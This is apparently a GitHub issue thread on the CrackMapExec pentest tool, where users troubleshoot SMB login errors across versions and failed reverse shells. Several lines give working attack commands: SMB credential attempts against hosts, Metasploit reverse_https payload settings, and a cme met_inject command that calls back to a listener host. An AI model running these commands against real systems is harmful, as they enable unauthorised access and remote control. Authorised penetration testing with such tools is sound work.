Closed n0bl1nk closed 4 years ago
can't confirm it:
bash$ python-test-env/bin/crackmapexec smb 10.0.0.110 -u admin -p 'admin'
SMB 10.0.0.110 445 LAPTOP-HRJ9REOB [*] Windows 10.0 Build 18362 x64 (name:LAPTOP-HRJ9REOB) (domain:LAPTOP-HRJ9REOB) (signing:False) (SMBv1:False)
SMB 10.0.0.110 445 LAPTOP-HRJ9REOB [-] LAPTOP-HRJ9REOB\admin:admin STATUS_LOGON_FAILURE
(python-test-env)
5.0.1 Version
I was using 4.0.1 version, but I installed 5.0.1 version because I can't get reverse shell with "met_inject" and "empire_exec" in 4.0.1 version.
Authentication is successful in 4.0.1 version
Try to test it in Pentoo ;-) Just kidding. I have tested with valid credentials, still can't confirm it. Please install it in a virtualenv and test in a "clean" env
Do you have any idea why I can't get reverse shell in 4.0.1 version? I succeed using psexec on metasploit.
set payload windows/meterpreter/reverse_https
set LHOST 192.168.211.136
set LPORT 4444
cme smb 192.168.211.10 -u Administrator -p 'Password' -M met_inject -o LHOST=192.168.211.136 LPORT=4444
but i can't get a session
if i set windows/meterpeter/reverse_tcp triggers but session dies.
4.0.1 was never officially released, so I have no idea where it came from. Anyway, it were a lot of changes recently, so you should really use the latest.
Okey thank you :)
FWIW, I am also receiving the same error on the same version on my Kali install. I also tried using a venv and received the same error within.
Unfortunately I cannot reproduce this. Please include more details, did you compile the binary yourself ? did you take it from the release version ?
setup: apt-get install crackmapexec
error when I run the command:
kali version:
Thanks @n0bl1nk can you test using this release ?
https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev
I am installing a new Kali, I will re-install and report on it.
Hello, same issue with the latest kali release.
I have this error message only for (Pwn3d!) user.
I will try with the new release.
Ok, please use the latest version from github, not the one from apt, we cannot change code on the apt version ;)
Working, thank you :)
Waiting for @n0bl1nk and closing if working
https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev is working
But still can't get a reverse-shell met_inject and empire_exec why? There is a section in my blog post that I mentioned about cme and I want to solve it.
empire_exec
met_inject
after running commands metasploit listener:
empire listener:
target system windows 2012 r2 I can successfully log in with metasploit psexec
cme can successfully do these and similar commands
I reference your problem with metasploit as a new issue @n0bl1nk
DESCRIPTION: cme 5.0.1 impacket modules errors.
COMMAND: crackmapexec smb 192.168.211.10 -u admin -p 'admin'
OUTPUT: